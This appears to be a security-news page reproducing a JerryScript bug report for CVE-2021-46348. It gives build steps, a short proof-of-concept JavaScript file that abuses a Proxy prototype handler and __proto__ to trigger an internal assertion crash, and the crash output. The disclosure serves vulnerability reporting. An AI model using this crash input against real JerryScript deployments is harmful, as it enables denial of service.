Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-46348: Assertion 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)' failed at jerryscript/jerry-core/ecma/base/ecma-literal-storage.c(ecma_free_string_list):77. · Issue #4941 · jerryscript-project/jerryscript

There is an Assertion 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)' failed at /jerry-core/ecma/base/ecma-literal-storage.c in JerryScript 3.0.0.

CVE
#microsoft#ubuntu#linux#js

JerryScript revision

Commit: a6ab5e9

Version: v3.0.0

Build platform

Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64)

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20

Test casepoc.js

var a = new Array(286331153, 572662306, 858993459, 1145324612, 303174162, 589505315, 305419888, 30583);
var handler = {
    getPrototypeOf: function (target, name) {
        return a;
    }
};
var p = new Proxy([], handler);
var b = [
    {},
    [],
    'natalie'
];
__proto__.__proto__ = p;
eval("function test_configurable_accessor() { print('replacement'); }");
[].flat.call(b);

​ ​Execution steps & Output

$ ./jerryscript/build/bin/jerry poc.js

Unhandled exception: 0: <eval>:1:64 1: poc.js:14:1 ICE: Assertion 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)' failed at jerryscript/jerry-core/ecma/base/ecma-literal-storage.c(ecma_free_string_list):77. Error: ERR_FAILED_INTERNAL_ASSERTION [1] 987 abort jerry poc.js

Credits: Found by OWL337 team.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907